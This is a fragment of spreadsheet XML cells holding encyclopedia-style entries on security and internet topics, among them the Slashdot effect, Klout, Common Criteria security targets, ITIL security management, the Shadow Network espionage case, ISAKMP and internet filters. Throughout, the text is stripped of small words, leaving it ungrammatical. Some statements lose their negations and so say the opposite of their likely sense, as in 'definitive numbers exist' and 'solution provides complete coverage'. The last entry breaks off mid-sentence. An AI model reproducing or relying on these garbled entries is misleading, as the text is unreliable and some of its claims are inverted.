reddit, stumbleupon fark consist brief submitted stories self-moderated discussion story. typical submission introduces news item website interest linking response, large masses readers tend simultaneously rush view referenced sites. ensuing flood page requests readers exceed site's available bandwidth ability servers respond, render site temporarily unreachable. extent major news sites corporate websites typically engineered serve large numbers requests therefore normally exhibit effect. websites fall victim hosted home servers, offer large images movie files inefficiently generated dynamic content (e.g. many database hits every even hits requesting page). these websites often became unavailable within minutes story's appearance, even comments posted. occasionally, paying slashdot subscribers (who access stories non-paying users) rendered site unavailable even story posted general readership. definitive numbers exist regarding precise magnitude slashdot effect, estimates peak mass influx page requests anywhere several hundred several thousand hits minute. flood usually peaked article site's front page gradually subsided story superseded newer items. traffic usually remained elevated levels article pushed front page, could take hours initial posting. however, articles significantly longer lifetimes popularity, newsworthiness, interest linked article. 2005, reporters commenting slashdot effect diminishing. however, effect seen involving twitter popular users mention website. communities when targeted website community-based structure, term also refer secondary effect large group users suddenly accounts start participate community. while cases considered good thing, others viewed disdain prior members, quite often sheer number people brings many unwanted aspects slashdot along trolling, vandalism, newbie-like behavior. this bears similarity 1990s usenet concept eternal september. assistance prevention many solutions proposed sites deal slashdot effect.there several systems automatically mirror slashdot-linked pages ensure content remains available even original site becomes unresponsive. sites process slashdotted able mitigate effect temporarily redirecting requests targeted pages mirrors. slashdot mirror sites links servers, endorse third party solution. mirroring content constitute breach copyright and, many cases, cause revenue lost targeted site. also denial-of-service attack flash crowds alleviation network streisand effect traffic references external links slashdot</t>
  </si>
  <si>
    <t>High Technology Crime Investigation Association</t>
  </si>
  <si>
    <t>high technology crime investigation association (htcia) international non-profit professional organization devoted prevention, investigation, prosecution crimes involving advanced technologies. author cybercrime expert, christopher brown, described htcia "one largest respected" associations kind.the association formally incorporated 1989 "designed encourage, promote, effect voluntary interchange data, information, experience, ideas knowledge methods, processes, techniques relating investigations security advanced technologies." association open enforcement personnel, investigators, technicians specialists prosecuting attorneys engaged investigation prosecution criminal civic activities computers advanced technologies utilized. association also open security professionals whose primary duties corporate security investigations. average yearly membership usually exceeds 3,000. members located primarily united states, canada, europe asia pacific.htcia members involved numerous high-profile cases years. notable killer (dennis lynn rader),numerous htcia members written books cybercrime investigations collecting digital evidence, including, christopher brown, warren kruse anthony reyes, bowker., todd shipley, kall loper. international training conference expo group holds annual international training conference expo year. conference alternated east (even years) west (odd years) coasts united states. references external links http://www.htcia.org/ http://www.htciaconference.org/ http://htcia.wordpress.com/2011/10/04/htcia-retrospective-journey/</t>
  </si>
  <si>
    <t>Klout</t>
  </si>
  <si>
    <t>klout website mobile used social media analytics rate users according online social influence "klout score", numerical value 100. determining user score, klout measured size user's social media network correlated content created measure users interact content. klout launched 2008.lithium technologies, acquired site march 2014, closed service 2018.klout used bing, facebook, foursquare, google+, instagram, linkedin (individuals' pages, corporate/business), twitter, wikipedia, youtube data create klout user profiles assigned "klout score". klout scores ranged 100, higher scores corresponding higher ranking breadth strength one's online social influence. while twitter users assigned score, users registered klout could link multiple social networks, network data aggregated influence user's klout score. methodology klout measured influence using data points twitter, following count, follower count, retweets, list memberships, many spam/dead accounts following you, influential people retweet unique mentions. this information combined data number social network followings interactions come klout score. other accounts flickr, blogger, tumblr, last.fm, wordpress could also linked users, weigh klout score. microsoft announced strategic investment klout september 2012 whereby bing would access klout influence technology, klout would access bing search data scoring algorithm.klout scores supplemented three nominally specific measures, klout calls "true reach", "amplification" "network impact". true reach based size user's engaged audience actively engage user's messages. amplification score relates likelihood one's messages generate actions, retweets, mentions, likes comments. network impact reflects computed influence value person's engaged audience. history 2007, fernandez underwent surgery required wire mouth shut. because could speak three months, turned facebook twitter social interaction. during period became obsessed idea "word mouth measurable." pulling data twitter’s api, created prototype would assign users score measure influence. midway 2008, showed prototype friends, told "the dumbest thing ever." business model perks primary business model klout involved companies paying klout perks campaigns, company offers free services products klout users match pre-defined criteria including scores, topics, geographic locations. while klout users received perks obligation write them, hope effectively advertise products social media. klout offered perks program beginning 2010. according klout fernandez, partnerships established november 2011. 2013, klout announced users claimed million perks across campaigns. klout business march 2013, klout announced intention begin displaying business analytics aimed helping business brand users learn online audiences. content page september 2012, klout announced information-sharing partnership bing search engine, showing klout scores bing searches allowing klout users post items selected bing social media. criticism several objections klout's methodology raised regarding process scores generated, overall societal effect. critics pointed klout scores representative influence person really has, highlighted barack obama, president united states, lower influence score number bloggers. other social critics argued klout score devalued authentic online communication promoted social ranking stratification trying quantify human interaction. klout attempted address criticisms, updated algorithms barack obama's importance better reflected.the site criticized violating privacy minors, exploiting users profit.john scalzi described principle behind klout's operation "socially evil" exploitation users' status anxiety. charles stross described service "the internet equivalent herpes," blogging analysis klout's terms conditions revealed company's business model illegal united kingdom, conflicted data protection 1998; stross advised readers delete klout accounts klout services.ben rothke concluded "klout work seems like need beta longer. klout applauded trying measure monstrosity called social influence; results influence truth, carry little influence."klout criticised opacity methodology. while claimed advanced machine learning techniques used, leveraging network theory, sean golliher analysed klout scores twitter users found simple logarithm number followers sufficient explain variance. november 2015 klout released academic paper discussing methodology ieee bigdata 2015 conference.in spite controversy, employers made hiring decisions based klout scores. reported article wired, recruited position fifteen years experience consulting companies including america online, ford kraft eliminated candidate specifically klout score, time favour candidate score notable events september 2011: klout integrated google+. october 2011: klout changed scoring algorithm, lowering many scores creating complaints. november 2011: klout partnered wahooly beta launch. january 2012: klout able raise estimated million host venture capital firms. february 2012: klout acquired local mobile neighborhood blockboard. 2012: klout announced growth 2000 partners one-year period. august 2012: klout changed algorithm again. september 2012: microsoft announced strategic investment klout undisclosed sum. march 2013: klout announced inclusion instagram analytics factoring klout scores. 2013: klout users claimed million perks across campaigns. march 2014: lithium technologies acquired klout. september 2015: engagement youtube content factored klout score october 2015: klout exposed inner workings klout score. 2018: lithium announced would ending service 2018. similar metrics cloze commun.it engagio peerindex also score, rating system brand/celebrity popularity bitclout, social network based popularity monetary value (cryptocurrency) assigned user references external links official website official business website</t>
  </si>
  <si>
    <t>Security Target</t>
  </si>
  <si>
    <t>common criteria information technology security evaluation, version part (called defines security target (st) "implementation-dependent statement security needs specific identified target evaluation (toe)". words, defines boundary specifies details toe. product evaluation process according document provided vendor product. defines information assurance security functional requirements given information system product, called target evaluation (toe). complete rigorous description security problem terms description, threats, assumptions, security objectives, security functional requirements (sfrs), security assurance requirements (sars), rationales. sars typically given number called evaluation assurance level (eal), indicating depth rigor security evaluation, usually form supporting documentation testing, product meets sfrs. contains (but detailed) implementation-specific information demonstrates product addresses security requirements. refer protection profiles (pps). case, must fulfill generic security requirements given pps, define requirements. security target outline introduction overview does, including features purpose. reference reference overview description2. conformance claims identifies conformance claims evaluation. version conformance claims part conformance claims part conformance claims conformance claims strict conformance demonstrable conformance3. security problem definition describes threats assumptions operational environment. objective demonstrate security problem intended addressed operational environment. threats adverse action performed threat agent asset. threat agents described aspects expertise, resources, opportunity, motivation. organizational security policies (osp) security rules, procedures, guidelines imposed organization toes operational environment. assumptions made operational environment behavior.4. security objectives concise abstract statement intended solution problem specified security problem definition. each security objective must trace back least threat osp. aspect security achieve purpose objective using certain mitigation measures, confidentiality, integrity, availability, user authenticity, access authorisation, accountability. confidentiality, integrity availability required support applicable foundational requirements.-[1] security objectives security objectives operational environment security objectives rationale justifications shows threats assumptions effectively addressed security objectives.5. extended components definition extended components must consist measurable objective elements conformance demonstrated. security requirements defines describes sfrs part sars part security functional requirements sfrs form clear, unambiguous well-defined description expected security behavior toe. security assurance requirements sars form clear, unambiguous established description expected activities undertaken gain assurance toe. security requirements rationale justification security objective demonstrates sfrs sufficient necessary.7.toe summary specifications enables evaluators potential consumers gain general understanding implemented. security functions function zone conduit prevent unauthorised electronic intervention impact influence normal functioning devices systems within zone conduit. summary specification must describe meets sfr. security specifications high-level view developer intends satisfy sfr. also common criteria protection profile evaluation assurance level (eal) common criteria testing laboratory references</t>
  </si>
  <si>
    <t>High-water mark (computer security)</t>
  </si>
  <si>
    <t>fields physical security information security, high-water mark access control introduced clark weissmann 1969. pre-dates bell–lapadula security model, whose first volume appeared 1972. under high-water mark, object less user's security level opened, object relabeled reflect highest security level currently open, hence name. practical effect high-water mark gradual movement objects towards highest security level system. user writing confidential document, checks unclassified dictionary, dictionary becomes confidential. then, user writing secret report checks spelling word, dictionary becomes secret. finally, user assigned assemble daily intelligence briefing secret level, reference dictionary makes dictionary secret, too. low-water mark low-water mark extension biba model. biba model, no-write-up no-read-down rules enforced. model rules exactly opposite rules bell-la padula model. low-water mark model, read permitted, subject label, reading degraded object label. classified floating label security models. also watermark (data synchronization) references</t>
  </si>
  <si>
    <t>Security awareness</t>
  </si>
  <si>
    <t>security awareness knowledge attitude members organization possess regarding protection physical, especially informational, assets organization. many organizations require formal security awareness training workers join organization periodically thereafter, usually annually. coverage topics covered security awareness training include: nature sensitive material physical assets come contact with, trade secrets, privacy concerns government classified information employee contractor responsibilities handling sensitive information, including review employee nondisclosure agreements requirements proper handling sensitive material physical form, including marking, transmission, storage destruction proper methods protecting sensitive information computer systems, including password policy two-factor authentication other computer security concerns, including malware, phishing, social engineering, etc. workplace security, including building access, wearing security badges, reporting incidents, forbidden articles, etc. consequences failure properly protect information, including potential loss employment, economic consequences firm, damage individuals whose private records divulged, possible civil criminal penaltiessecurity awareness means understanding potential people deliberately accidentally steal, damage, misuse data stored within company's computer systems throughout organization. therefore, would prudent support assets institution (information, physical, personal) trying stop happening. according european network information security agency, "awareness risks available safeguards first line defence security information systems networks.""the focus security awareness consultancy achieve long term shift attitude employees towards security, whilst promoting cultural behavioural change within organisation. security policies viewed enablers organisation, series rules restricting efficient working business." measuring security awareness 2016 study, researchers developed method measuring security awareness. specifically measured "understanding circumventing security protocols, disrupting intended functions systems collecting valuable information, getting caught" 38). researchers created method could distinguish experts novices people organize different security scenarios groups. experts organize scenarios based centralized security themes novices organize scenarios based superficial themes. also access control physical security security security controls security management iso/iec 27002 internet security awareness training references external links army's security education, training awareness site security awareness cycle comparison security awareness training companies</t>
  </si>
  <si>
    <t>Hackerspace.gr</t>
  </si>
  <si>
    <t>hackerspace.gr ('hsgr') hackerspace athens, greece, established 2011. operates cultural center, computer laboratory meeting place (with free wireless access). hackerspace.gr promotes creative coding hardware hacking variety activities. according website: "hackerspace.gr physical space dedicated creative code hardware hacking, athens". vision hackerspace.gr vision inspired open source philosophy. main values, according vision page, excellence, sharing, consensus, do-ocracy. self-funded community, membership fee, individual donations supporters. every year hackerspace.gr publishes annual financial balance titled "the cost hacking". events organizes workshops, lectures, entertainment informational events. events calendar lists several events weekly. furthermore, hackerspace.gr open visitors long administrators premises. projects hackerspace.gr incubator place many projects. currently openrov taskforce hackerspace.gr. verese community, project participating mozilla webfwd, hosting regular meetings hackerspace.gr. ardupad also incubated hackerspace.gr. drop located central area hackerspace. custom open hardware delta printer design, anadelta developed cover members need large printer. services hackerspace provides several online services members, visitors, general public. particular members running instance etherpad lite collaborative editor, diaspora jabber/xmpp service. mobile hackerspace hackerspace.gr usually deploys geodesic dome order establish mobile hackerspace large number members participate events venues away physical location providing tools, equipment free charge services attendees. libre space foundation hackerspace.gr utilized headquarters libre space foundation, open space technologies non-profit, laboratory main working space. libre space foundation shares testing manufacturing equipment hackerspace.gr's users visitors.libre space foundation deployed first satnogs ground station rooftop hackerspace.gr used machine, electronics facilities manufacture, integration initial testing upsat first open source satellite, also first satellite made greece. references external links official website</t>
  </si>
  <si>
    <t>ITGC</t>
  </si>
  <si>
    <t>general controls (itgc) controls apply systems, components, processes, data given organization information technology (it) environment. objectives itgcs ensure proper development implementation applications, well integrity programs, data files, computer operations. common itgcs: logical access controls infrastructure, applications, data. system development life cycle controls. program change management controls. data center physical security controls. system data backup recovery controls. computer operation controls. general computer controls itgcs also referred general computer controls (gcc) defined controls, application controls, relate environment within computer-based application systems developed, maintained operated, therefore applicable applications. objectives general controls ensure proper development implementation applications, integrity program data files computer operations. like application controls, general controls either manual programmed. examples general controls include development implementation strategy security policy, organization staff separate conflicting duties planning disaster prevention recovery. global technology audit guide (gtag) gtags written straightforward business language address timely issue related information technology (it) management, control, security. date, institute internal auditors (iia) released gtags following topics: gtag information technology controls gtag change patch management controls: critical organizational success gtag continuous auditing: implications assurance, monitoring, risk assessment gtag management auditing gtag managing auditing privacy risks gtag managing auditing vulnerabilities gtag information technology outsourcing gtag auditing application controls gtag identity access management gtag business continuity management gtag developing audit plan gtag auditing projects gtag fraud prevention detection automated world gtag auditing user-developed applications gtag formerly information security governance--removed combined gtag gtag data analysis technologies gtag auditing governance also information technology controls internal audit internal control top–down risk assessment references gtag christine bellino, jefferson wells, july 2007 gtag steve hunt, enterprise controls consulting enterprise controls consulting july 2007 isaca glossary terms external links institute internal auditors information systems audit control association</t>
  </si>
  <si>
    <t>ITIL security management</t>
  </si>
  <si>
    <t>itil security management describes structured fitting security organization. itil security management based 27001 standard. "iso/iec 27001:2005 covers types organizations (e.g. commercial enterprises, government agencies, not-for profit organizations). iso/iec 27001:2005 specifies requirements establishing, implementing, operating, monitoring, reviewing, maintaining improving documented information security management system within context organization's overall business risks. specifies requirements implementation security controls customized needs individual organizations parts thereof. iso/iec 27001:2005 designed ensure selection adequate proportionate security controls protect information assets give confidence interested parties." basic concept security management information security. primary goal information security control access information. value information must protected. these values include confidentiality, integrity availability. inferred aspects privacy, anonymity verifiability. goal security management comes parts: security requirements defined service level agreements (sla) external requirements specified underpinning contracts, legislation possible internal external imposed policies. basic security guarantees management continuity. this necessary achieve simplified service-level management information security.slas define security requirements, along legislation applicable) contracts. these requirements performance indicators (kpis) used process management interpreting results security management process. security management process relates itil-processes. however, particular section obvious relations relations service level management, incident management change management processes. security management security management continuous process compared edwards deming's quality circle (plan, check, act). inputs requirements clients. requirements translated security services security metrics. both client plan sub-process affect sla. input client process. provider develops security plans organization. these plans contain policies operational level agreements. security plans (plan) implemented (do) implementation evaluated (check). after evaluation, plans plan implementation maintained (act). activities, results/products process documented. external reports written sent clients. clients able adapt requirements based information received reports. furthermore, service provider adjust plan implementation based findings order satisfy requirements stated (including requirements). control first activity security management process “control” sub-process. control sub-process organizes manages security management process. control sub-process defines processes, allocation responsibility policy statements management framework. security management framework defines sub-processes development, implementation evaluations action plans. furthermore, management framework defines results reported clients. meta-process model control sub-process based activity diagram gives overview activities control sub-process. grey rectangle represents control sub-process smaller beam shapes inside represent activities take place inside meta-data model control sub-process based class diagram. figure 2.1.2 shows metamodel control sub-process. figure 2.1.2: meta-process model control sub-process control rectangle white shadow open complex concept. this means control rectangle consists collection (sub) concepts. figure 2.1.3 process data model control sub-process. shows integration models. dotted arrows indicate concepts created adjusted corresponding activities. figure 2.1.3: process-data model control sub-process plan plan sub-process contains activities cooperation service level management lead (information) security section sla. furthermore, plan sub-process contains activities related underpinning contracts specific (information) security. plan sub-process goals formulated specified form operational level agreements (ola). these ola's defined security plans specific internal organization entity service provider. besides input sla, plan sub-process also works policy statements service provider itself. said earlier policy statements defined control sub-process. operational level agreements information security implemented based itil process. this requires cooperation itil processes. example, security management wishes change infrastructure order enhance security, changes done change management process. security management delivers input (request change) change. change manager responsible change management process. plan consists combination unordered ordered (sub) activities. sub-process contains three complex activities closed activities standard activity. just control sub-process plan sub-process modeled using meta-modeling technique. left side figure 2.2.1 meta-data model plan sub-process. plan rectangle open (complex) concept aggregation type relationship closed (complex) concepts standard concept. closed concepts expanded particular context. following picture (figure 2.2.1) process-data diagram plan sub-process. this picture shows integration models. dotted arrows indicate concepts created adjusted corresponding activities plan sub-process. figure 2.2.1: process-data model plan sub-process implementation implementation sub-process makes sure measures, specified plans, properly implemented. during implementation sub-process measures defined changed. definition change measures takes place plan sub-process cooperation change management process. left side figure 2.3.1 meta-process model implementation phase. four labels black shadow mean activities closed concepts expanded context. arrows connect four activities, meaning activities unordered reporting carried completion four activities. during implementation phase concepts created adjusted. concepts created and/or adjusted modeled using meta-modeling technique. right side figure 2.3.1 meta-data model implementation sub-process. implementation documents open concept expanded upon context. consists four closed concepts expanded irrelevant particular context. order make relations models clearer integration models illustrated figure 2.3.1. dotted arrows running activities concepts illustrate concepts created/ adjusted corresponding activities. figure 2.3.1: process-data model implementation sub-process evaluation evaluation necessary measure success implementation security plans. evaluation important clients (and possibly third parties). results evaluation sub-process used maintain agreed measures implementation. evaluation results lead requirements corresponding request change. request change defined sent change management. three sorts evaluation self-assessment, internal audit external audit. self-assessment mainly carried organization processes. internal audits carried internal it-auditors. external audits carried external, independent it-auditors. besides already mentioned, evaluation based communicated security incidents occurs. important activities evaluation security monitoring it-systems; verify security legislation security plan implementation; trace react undesirable it-supplies. figure 2.4.1: process-data model evaluation sub-process process-data diagram illustrated figure 2.4.1 consists meta-process model meta-data model. evaluation sub-process modeled using meta-modeling technique. dotted arrows running meta-process diagram (left) meta-data diagram (right) indicate concepts created/ adjusted corresponding activities. activities evaluation phase standard activities. short description evaluation phase concepts table 2.4.2 concepts listed defined. table 2.4.2: concept definition evaluation sub-process security management maintenance because organizational it-infrastructure changes, security risks change time, requiring revisions security section service level agreements security plans. maintenance based results evaluation sub-process insight changing risks. these activities produce proposals. proposals either serve inputs plan sub-process travel cycle adopted part maintaining service level agreements. cases proposals could lead activities action plan. actual changes made change management process. figure 2.5.1 process-data diagram implementation sub-process. this picture shows integration meta-process model (left) meta-data model (right). dotted arrows indicate concepts created adjusted activities implementation phase. figure 2.5.1: process-data model maintenance sub-process maintenance sub-process starts maintenance service level agreements maintenance operational level agreements. after activities take place particular order) request change request change activity take place request change activity concluded reporting activity starts. request change reporting activity start directly first activities. concepts meta-data model created/ adjusted maintenance phase. list concepts definition take look table 2.5.2. table 2.5.2: concept definition plan sub-process security management complete process-data model figure 2.6.1: complete process-data model security management process relations itil processes security management process, stated introduction, relations almost itil-processes. these processes are: customer relationship management service level management availability management capacity management service continuity management configuration management release management incident management service desk problem management change management (itsm)within processes activities concerning security required. concerning process process manager responsible activities. however, security management gives indications concerning process structure activities. example: internal e-mail policies internal e-mail subject multiple security risks, requiring corresponding security plan policies. example itil security management approach used implement e-mail policies. security management team formed process guidelines formulated communicated employees providers. these actions carried control phase. subsequent planning phase, policies formulated. policies specific e-mail security formulated added service level agreements. phase entire plan ready implemented. implementation done according plan. after implementation policies evaluated, either self-assessments, internal external auditors. maintenance phase e-policies adjusted based evaluation. needed changes processed requests change. also infrastructure management services itil microsoft operations framework information security management system cobit capability maturity model ispl also information security references sources van, (2004). it-service management: introductie basis itil. haren publishing cazemier, jacques overbeek, paul peters, louk (2000). security management, stationery office. security management. (february 2005). microsoft tse, (2005). security modern business: security assessment model information security practices. hong kong: university hong kong.</t>
  </si>
  <si>
    <t>Shadow Network</t>
  </si>
  <si>
    <t>shadow network china-based computer espionage operation stole classified documents emails indian government, office dalai lama, high-level government networks. this incident second cyber espionage operation sort china, discovered researchers information warfare monitor, following discovery ghostnet march 2009. shadow network report "shadows cloud: investigating cyber espionage 2.0" released april 2010, approximately year publication "tracking ghostnet."the cyber spying network made internet services, social networking cloud computing platforms. services included twitter, google groups, baidu, yahoo mail, blogspot, blog.com, used host malware infect computers malicious software. discovery shadow report released following 8-month collaborative investigation researchers canada-based information warfare monitor united states shadowserver foundation. shadow network discovered ghostnet investigation, researchers said sophisticated difficult detect. following publication ghostnet report, several listed command control servers went offline; however, cyber attacks tibetan community cease.the researchers conducted field research dharamshala, india, consent tibetan organizations, able monitor networks order collect copies data compromised computers identify command control servers used attackers. field research done information warfare monitor shadowserver foundation found computer systems office holiness dalai lama (ohhdl) compromised multiple malware networks, shadow network.further research shadow network revealed that, india dalai lama's offices primary focus attacks, operation compromised computers every continent except australia antarctica.the research team recovered 1,500 e-mails dalai lama's office along number documents belonging indian government. this included classified security assessments several indian states, reports indian missile systems, documents related india's relationships middle east, africa, russia. documents also stolen related movements nato forces afghanistan, united nations economic social commission asia pacific (unescap). hackers indiscriminate took, included sensitive information well financial personal information. origin attackers tracked e-mail addresses chinese city chengdu sichuan province. there suspicion, confirmation, hackers connection university electronic science technology chengdu. account another hacker linked chengdu resident claimed know little hacking. references external links shadowserver foundation citizen secdev group information warfare monitor</t>
  </si>
  <si>
    <t>Internet Security Association and Key Management Protocol</t>
  </si>
  <si>
    <t>internet security association management protocol (isakmp) protocol defined 2408 establishing security association (sa) cryptographic keys internet environment. isakmp provides framework authentication exchange designed exchange independent; protocols internet exchange (ike) kerberized internet negotiation keys (kink) provide authenticated keying material isakmp. example: describes protocol using part oakley part skeme conjunction isakmp obtain authenticated keying material isakmp, security associations ietf ipsec doi. overview isakmp defines procedures authenticating communicating peer, creation management security associations, generation techniques threat mitigation (e.g. denial service replay attacks). framework, isakmp typically utilizes exchange, although methods implemented kerberized internet negotiation keys. preliminary formed using protocol; later fresh keying done. isakmp distinct exchange protocols order cleanly separate details security association management (and management) details exchange. there many different exchange protocols, different security properties. however, common framework required agreeing format attributes negotiating, modifying deleting sas. isakmp serves common framework. isakmp implemented transport protocol. implementations must include send receive capability isakmp using port 500. implementation openbsd first implemented isakmp 1998 isakmpd(8) software. ipsec services service microsoft windows handles functionality. kame project implements isakmp linux open source bsds. modern cisco routers implement isakmp negotiation. vulnerabilities leaked presentations released spiegel indicate isakmp exploited unknown manner decrypt ipsec traffic, ike. researchers discovered logjam attack state breaking 1024-bit diffie–hellman group would break servers, million https domains, servers, consistent leaks according researchers. also oakley protocol ipsec gdoi references external links 2408 internet security association management protocol 2407 internet security domain interpretation isakmp</t>
  </si>
  <si>
    <t>Internet Security Awareness Training</t>
  </si>
  <si>
    <t>internet security awareness training (isat) training given members organization regarding protection various information assets organization. isat subset general security awareness training (sat). even small medium enterprises generally recommended provide training, organizations need comply government regulations (e.g., gramm–leach–bliley act, payment card industry data security standard, health insurance portability accountability act, sarbox) normally require formal isat annually employees. often training provided form online courses. isat, also referred security education, training, awareness (seta), organizations train create awareness information security management within environment. beneficial organizations employees well trained feel empowered take important actions protect organizational data. seta program target must based user roles within organizations positions expose organizations increased risk levels, specialized courses must required. coverage there general topics cover training, necessary organization coverage strategy based needs, ensure training practical captures critical topics relevant organization. threat landscape changes frequently, organizations continuously review training programs ensure relevance current trends.topics covered isat include: appropriate methods protecting sensitive information personal computer systems, including password policy various computer security concerns, including spam, malware, phishing, social engineering, etc. consequences failure properly protect information, including potential loss, economic consequences firm, damage individuals whose private records divulged, possible civil criminal penalties.being internet security aware means understand people actively trying steal data stored within organization's computers. (this often focuses user names passwords, criminal elements ultimately access bank accounts high-value assets.) that important protect assets organization stop happening.the general scope include topics password security, email phishing, social engineering, mobile device security, sensitive data security, business communications. contrast, requiring specialized knowledge usually required take technical in-depth training courses. suppose organization determines best available training tools market, must ensure sets objectives training meet, including confirming training provide employees knowledge understand risks behaviors needed managing them, actions take prevent detect security incidents, using language easily understandable trainees, ensuring pricing reasonable.organizations recommended base isat training content employee roles culture; policy guide training employees gave following examples sources reference materials: national institute standards technology (nist) special publication 800-50, building information technology security awareness training program international standards organization (iso) 27002:2013, information technology—security techniques—code practice information security controls international standards organization (iso) 27001:2013, information technology security techniques information security management systems cobit appendix f.2, detailed guidance: services, infrastructure applications enabler, security awarenessthe training must focus current threats specific organization impacts materializes result user actions. including practical examples ways dealing scenarios help users know appropriate measures take. good practice periodically train customers specific organizations threats face people malicious intentions.coverage strategy driven organization’s policy. help truly determine level depth training conducted global level business unit level, combination both. policy also empowers responsible party within organization training. importance employees whether organizations breached not; must policy creating awareness training emerging threats actions take safeguarding sensitive information reporting observed unusual activity within corporate environment.research shown helped reduce cyber-attacks within organizations, especially comes phishing, trainees learned identify attack modes give self-assurance take action appropriately.there increase phishing attacks, become increasingly important people understand attacks work, actions required prevent shown significant impact number successful phishing attacks organizations. compliance requirements various regulations laws mandate organizations specific industries, including gramm–leach–bliley (glba) financial services, federal information security modernization 2014 federal agencies, european union’s general data protection regulation (gdpr). federal information security modernization employees contractors federal agencies required receive security awareness training annually, program needs address job-related information security risks linked provide knowledge lessen security risks. health insurance portability accountability health insurance portability accountability security rule, privacy rule requiring creation security awareness training program ensuring employees trained accordingly. payment card industry data security standard payment card industry security standards council, governing council stakeholders payment industry, formed american express, discover, international, mastercard, visa developed requirement payment industry. requirement 12.6 requires member organizations institute formal security awareness program. there published guide organizations adhere setting program. states training regulations some states mandate security awareness training whiles simply recommend voluntary training. among states require training employees include: colorado (the colorado information security act, colorado revised statutes 24-37.5-401 seq.) connecticut 301.1-1 cyber security awareness training (ps800)) florida (florida statutes chapter 282) georgia (executive order e.o.182 mandated training within days issue) illinois (cook county) indiana 1240) louisiana (louisiana division administration, office technology services 633) maryland (20-07 security policy) montana (mandatory cyber training executive branch state employees) nebraska nevada (agency-by-agency state employee requirement state security standard security) hampshire jersey 1654) north carolina ohio (it-15 security awareness training) pennsylvania texas utah vermont virginia west virginia code section 5a-6-4a) training techniques below common training techniques, even though blended depending operating environment: interactive video training this technique allows users trained using two-way interactive audio video instruction. web-based training this method allows employees users take training independently usually testing component determine learning taken place. not, users allowed retake course test ensure complete understanding material. non-web, computer-based training some organizations prefer internet locations without internet connectivity; hence technique provides effective load training programs onto computers users. onsite, instructor-led training this popular technique security awareness training efficient large organizations. some organizations method initial on-boarding training employees require onsite on-boarding.training conducted on-boarding least annually employees third parties access organizational information systems; medium either face-to-face instruction online, typically focusing recognizing attack symptoms safeguarding sensitive data using several security mechanisms, including passwords, encryption, secure sessions.isat also teaches refreshes memory participants various present threats, emerging security threats, attack vectors, organizational policies related information security, basic principles norms maintain security internet.organizations consider several options comes training media deliver security awareness training users, research using learning theory, media richness theory, cognitive load theory shown organizations need invest heavily highly-rich media lead improved user behavior; training content important.sat services often coupled additional tools services related company’s employees including: dark monitoring services detecting company email addresses domains involved data breach, notifying administrators data exposed tied employee's email address. policy compliance guiding users cybersecurity governance policies. send policies users acknowledge track report compliance. risk assessments assess identify company customer’s threats vulnerabilities. also access control computer security cybersecurity awareness information assurance information security information security awareness internet security network security phishing physical security security security awareness security controls security management social engineering references</t>
  </si>
  <si>
    <t>Internet Security Research Group</t>
  </si>
  <si>
    <t>internet security research group (isrg) californian public-benefit corporation focuses internet security.let's encrypt—its first major initiative—aims make transport layer security (tls) certificates available free automated fashion. josh serves group's executive director. board members josh (internet security research group) isrg executive director alex halderman (university michigan) vicky chin (mozilla) aanchal gupta (independent) jennifer granick (aclu) pascal jaillon (ovh) richard barnes (cisco systems) christine runnegar (internet society) erica portnoy (electronic frontier foundation) david nalley (amazon) references external links official website seth schoen's libre planet 2015 lecture let's encrypt</t>
  </si>
  <si>
    <t>Internet Storm Center</t>
  </si>
  <si>
    <t>internet storm center (isc) program sans technology institute, branch sans institute monitors level malicious activity internet, particularly regard large-scale infrastructure events. history evolved "incidents.org", site initially founded sans institute assist public-private sector cooperation cutover. 2000, incidents.org started cooperate dshield create consensus incidents database (cid). collected security information cooperating sites agencies mass analysis. march 2001, sans responsible early detection "lion" worm attacks various facilities. quick warning counter-efforts organized instrumental controlling damage done worm, otherwise might considerably worse. later, dshield integrated closer incidents.org sans institute started sponsor dshield. renamed "internet storm center" acknowledgement uses distributed sensor network similar weather reporting center detect track atmospheric storm provide warnings. since time expanded monitoring operations; website cites figure twenty million "intrusion detection entries" day. continues provide analyses alerts security threats internet community. during last hours 2005 first weeks 2006, internet storm center went longest period time "yellow" infocon vulnerability. prominent feature daily "handler diary" prepared volunteer incident handlers summarized events day. frequently first public source attack trends actively facilitates cooperation soliciting information understand particular attacks better. internet storm center currently staffed approximately volunteers, representing countries many industries. notable members director isc: marcus sachs chief technical officer: johannes ullrich handler liston external links internet storm center webpage sans technology institute infocon repository industrial security incidents</t>
  </si>
  <si>
    <t>Internet filter</t>
  </si>
  <si>
    <t>internet filter software restricts controls content internet user capable access, especially utilized restrict material delivered internet web, email, means. content-control software determines content available blocked. such restrictions applied various levels: government attempt apply nationwide (see internet censorship), can, example, applied internet service provider clients, employer personnel, school students, library visitors, parent child's computer, individual users computers. motive often prevent access content computer's owner(s) authorities consider objectionable. when imposed without consent user, content control characterised form internet censorship. some content-control software includes time control functions empowers parents amount time child spend accessing internet playing games computer activities. countries, software ubiquitous. cuba, computer user government-controlled internet cafe types certain words, word processor browser automatically closed, "state security" warning given. terminology term "content control" used occasion cnn, playboy magazine, francisco chronicle, york times. however, several terms, including "content filtering software", "filtering proxy servers", "secure gateways", "censorware", "content security control", "web filtering software", "content-censoring software", "content-blocking software", often used. "nannyware" also used product marketing media. industry research company gartner uses "secure gateway" (swg) describe market segment.companies make products selectively block sites refer products censorware, prefer terms "internet filter" "url filter"; specialized case software specifically designed allow parents monitor restrict access children, "parental control software" also used. some products sites user accesses rates based content type reporting "accountability partner" person's choosing, term accountability software used. internet filters, parental control software, and/or accountability software also combined product. those critical software, however, term "censorware" freely: consider censorware project, example. term "censorware" editorials criticizing makers software widespread covers many different varieties applications: xeni jardin used term march 2006 editorial york times discussing american-made filtering software suppress content china; month high school student used term discuss deployment software school district.in general, outside editorial pages described above, traditional newspapers term "censorware" reporting, preferring instead less overtly controversial terms "content filter", "content control", "web filtering"; york times wall street journal appear follow practice. hand, web-based newspapers cnet term editorial journalistic contexts, example "windows live censorware." types filtering filters implemented many different ways: software personal computer, network infrastructure proxy servers, servers, firewalls provide internet access. solution provides complete coverage, companies deploy technologies achieve proper content control line policies. browser based filters browser based content filtering solution lightweight solution content filtering, implemented third party browser extension.e-mail filters e-mail filters information contained mail body, mail headers sender subject, e-mail attachments classify, accept, reject messages. bayesian filters, type statistical filter, commonly used. both client server based filters available.client-side filters this type filter installed software computer filtering required. this filter typically managed, disabled uninstalled anyone administrator-level privileges system. dns-based client-side filter would sinkhole, pi-hole.content-limited filtered) isps content-limited filtered) isps internet service providers offer access portion internet content opt-in mandatory basis. anyone subscribes type service subject restrictions. type filters used implement government, regulatory parental control subscribers.network-based filtering this type filter implemented transport layer transparent proxy, application layer proxy. filtering 